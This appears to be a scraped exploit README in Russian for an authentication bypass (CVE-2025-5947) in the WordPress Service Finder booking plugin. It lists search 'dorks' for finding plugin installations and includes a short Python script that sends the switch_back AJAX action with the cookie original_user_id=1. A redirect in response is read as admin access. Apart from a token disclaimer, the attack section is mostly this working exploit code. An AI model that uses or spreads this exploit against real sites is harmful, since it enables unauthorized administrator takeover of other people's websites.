## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-M4RGS-CVE-2025-5947_EXPLOIT
# 🔍 Эксплойт плагина WordPress — Service Finder (sf-booking)
## Обзор
Плагин **Service Finder** — это система бронирования и управления услугами для WordPress.
Из-за его популярности и сложности в некоторых версиях были обнаружены проблемы безопасности, связанные с **неаутентифицированными AJAX-эндпоинтами** или некорректным контролем доступа.
В этом README объясняется, как исследователи могут безопасно идентифицировать установки и следовать этическим практикам (dbr krk).
* * *
## Уязвимые WP-дорки
`/wp-content/plugins/service-finder/`
`/wp-content/plugins/service-finder-bookings/`
`/wp-content/plugins/sf-booking/`
* * *
## Порядок действий при эксплуатации
> ⚠️ **Отказ от ответственности:**
> Эти поиски предназначены **только** для **образовательных** и **исследовательских** целей. Не предпринимайте **несанкционированный** доступ или эксплуатацию.
root@kitploit:~
import requests
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
'original_user_id': '1',
}
r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
* `300-399`: ✅ УЯЗВИМОСТЬ! Перенаправление в админ-панель как АДМИНИСТРАТОР
* `400-499`: ⚠️ Ошибка клиента — запрос был недействительным или неавторизованным, не уязвимость
* * *
## Ссылки
* База данных плагинов WPScan — https://wpscan.com/plugins/
* Национальная база данных уязвимостей (NVD) — https://nvd.nist.gov/
* OWASP — методы Google Dorking / разведки
* Рекомендации по раскрытию информации HackerOne — https://www.hackerone.com/disclosure-guidelines
* * *
## Автор
**Taha Mounir**
* * *